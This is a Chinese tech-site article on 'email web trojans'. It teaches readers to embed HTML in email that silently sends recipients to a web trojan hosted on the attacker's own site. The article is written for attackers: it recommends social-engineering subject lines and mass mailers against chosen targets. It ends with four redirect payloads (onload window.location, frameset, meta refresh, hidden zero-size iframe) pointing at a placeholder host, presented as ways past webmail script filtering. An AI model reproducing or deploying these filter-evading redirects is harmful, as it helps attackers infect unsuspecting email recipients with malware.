扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
大家肯定对网页木马已经很熟悉了,但大家可能对邮件网页木马还不是很熟悉。其实这个也许有些高手以前已经发现并使用很久了。但我一直未见网上及杂志上有此方面的内容。这里我就以技术共享的原则跟大家谈谈邮件网页木马的思路及实现方法。
邮件网页木马的危害巨大,它能化被动为主动。目前网络上流行的网页木马其实是很被动的,它需要被害者点击目标网址。随着现在网民的安全观念的增强,网民一般不会轻易点击陌生的网址。但邮件网页木马就不一样了,你可以将电子邮件发送到你想要攻击的目标信箱。只要你根据社会工程学及心理学的知识,将邮件的标题看上去不明显像是垃圾邮件或广告,那么接收者肯定会点击此邮件的。只要他点击了此邮件主题,看了信,哈哈,他就中招了!当然你也可以通过邮件群发器,这样的话,传播速率比普通的网页木马以及电子书木马不知高多少呢!而且它有个最大的优点,那就是具有目标可指定性。它可以攻击你想要的指定用户。这一点是普通方法无法比拟的。
邮件网页木马其实就是在发E-mail以HTML方式内嵌网页木马,使邮件本身成为一张网页木马。到这时你也许回大呼,我怎么没想到啊!呵呵,不怕做不到,只怕想不到啊。其实有些技术本身并不难,但就是怕不往这方面想啊。我还是赶快转入正题吧,否则,坏柿子扔过来啦!闪!
聪明的你此时可能会说,邮件网页木马岂不是很简单啊,只要在发邮件是选择以HTML方式发送,再将网页木马的源代码写入即可。事实上当然没这么简单,因为国内的绝大部分电子信箱都对其中一些关键代码进行的屏蔽过滤。因而本文将重点研究怎样突破重围,在电子邮件中引入网页木马,达到我们的目的。
一般的网页木马都用到javasccript,但绝大部分邮件系统都对<script>标记作了屏蔽。从而我们只能另辟新法。我们可以不直接将网页木马的代码写入邮件中,因为如果写入的话,有关代码会被屏蔽,网页木马将失效。我们可以写入转向代码,使用户浏览此邮件时转向我们放在自己网站上的网页木马。当然,邮件网页木马的难点就在转向代码。写转向代码要有讲究,因为写得不巧妙的话,代码将会被邮件系统屏蔽。
下面笔者来谈谈几种有效的可以在电子邮件中引入网页木马的且没被邮件服务器屏蔽的转向代码。因为绝大部分邮件系统都对<script>标记作了屏蔽,所以为了转向代码有效,均不使用JS和VBS标记。
1. window.location 法,代码如下
<body onload="window.location='http://xxxxx';"></body> |
<frameset cols="100%,*"> <frame src="http://xxxxx" scrolling="auto"> </frameset> |
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://xxxxx"> |
<iframe src="http://xxxxx" width="0" height="0" frameborder="0"> |
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。